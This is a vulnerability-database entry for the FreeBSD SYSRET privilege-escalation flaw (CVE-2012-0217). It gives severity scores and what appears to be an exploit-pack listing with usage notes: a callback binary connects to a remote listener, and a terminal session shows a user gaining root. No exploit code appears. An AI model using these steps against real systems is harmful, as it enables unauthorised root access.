7.2 High
CVSS2
Access Vector
LOCAL
Access Complexity
LOW
Authentication
NONE
Confidentiality Impact
COMPLETE
Integrity Impact
COMPLETE
Availability Impact
COMPLETE
AV:L/AC:L/Au:N/C:C/I:C/A:C
0.001 Low
EPSS
Percentile
21.9%
Name | SYSRET |
---|---|
CVE | CVE-2012-0217 Exploit Pack |
VENDOR: Intel,FreeBSD | |
Notes: | |
Tested on FreeBSD 9.0-RC3 and FreeBSD 9.0-RELEASE* AMD64 |
To test this exploit from CANVAS use the ./backdoors/mosdef_callbacks/mosdef_callback_fbsd9_i386
callback binary to establish a BSD node on a universal CANVAS listener. Then run the SYSRET
module against this node to elevate your privileges on the node. This should work on FreeBSD
9.0-RELEASE* amd64 on 64bit Intel processors. Note this will not spawn a new node, but rather
keep the existing node connection with elevated privileges.
Alternatively you can use the Resources/x binary outside of the framework.
$ uname -a
FreeBSD freebsd90 9.0-RELEASE FreeBSD 9.0-RELEASE #0: Tue Jan 3 07:46:30 UTC 2012 [email protected]:/usr/obj/usr/src/sys/GENERIC amd64
$ id
uid=1001(immunity) gid=1001(immunity) groups=1001(immunity)
$ ./x
[] FeeBSD amd64 local r00t - sysret []
[DEBUG]: current target: 9.0-RELEASE
[DEBUG]: supported release: 9.0-RELEASE found
[DEBUG]: Triggering fault…
[DEBUG]: Resumed!!! -> geteuid()=0
uid=1001(immunity) gid=1001(immunity) euid=0(root) groups=1001(immunity)
Repeatability: Infinite
References: http://security.freebsd.org/advisories/FreeBSD-SA-12:04.sysret.asc
CVE Url: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0217